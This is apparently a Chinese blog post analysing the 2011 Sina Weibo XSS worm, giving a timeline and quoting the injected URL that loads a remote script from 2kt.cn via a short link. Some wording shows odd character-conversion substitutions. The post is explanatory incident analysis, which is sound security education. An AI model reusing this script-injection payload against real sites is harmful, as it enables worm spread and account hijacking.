天天看點

XSS第四節,XSS攻擊執行個體(一)

         在開始執行個體的講解之前,先看一下xss的危害情況,第一張圖中說明和xss相關的cve漏洞有7417個(http://web.nvd.nist.gov/view/vuln/search-results?query=xss&search_type=all&cves=on),第二張圖說明在了烏雲漏洞平台(www.wooyun.org)上和xss相關的漏洞有2360個,足見xss威力還是很大的。

XSS第四節,XSS攻擊執行個體(一)
XSS第四節,XSS攻擊執行個體(一)

      這次舉的例子是2011年6月28日新浪微網誌xss攻擊事件

事件的經過線索如下:

20:14,開始有大量帶v的認證使用者中招轉發蠕蟲

20:30,2kt.cn中的病毒頁面無法通路

20:32,新浪微網誌中hellosamy使用者無法通路

21:02,新浪漏洞修補完畢

        新浪微網誌事件是利用了微網誌廣場頁面 http://weibo.com/pub/star 的一個url注入了js腳本,其通過http://163.fm/pxzhoxn 短連結服務,将連結指向:http://weibo.com/pub/star/g/xyyyd%22%3e%3cscript%20src=//www.2kt.cn/images/t.js%3e%3c/script%3e?type=update  

其中的位址為:< script src="//www.2kt.cn/images/t.js"></script>,下面附一張來自騰訊科技的配圖,

XSS第四節,XSS攻擊執行個體(一)

         當時大多數分析者認為 chrome 和 safari 都沒中招,ie、firefox未能幸免。但ie8以後自動開啟了xss防禦,是以普通使用者使用ie8以上版本和chrome以及safari還是能防範普通xss攻擊的。

繼續閱讀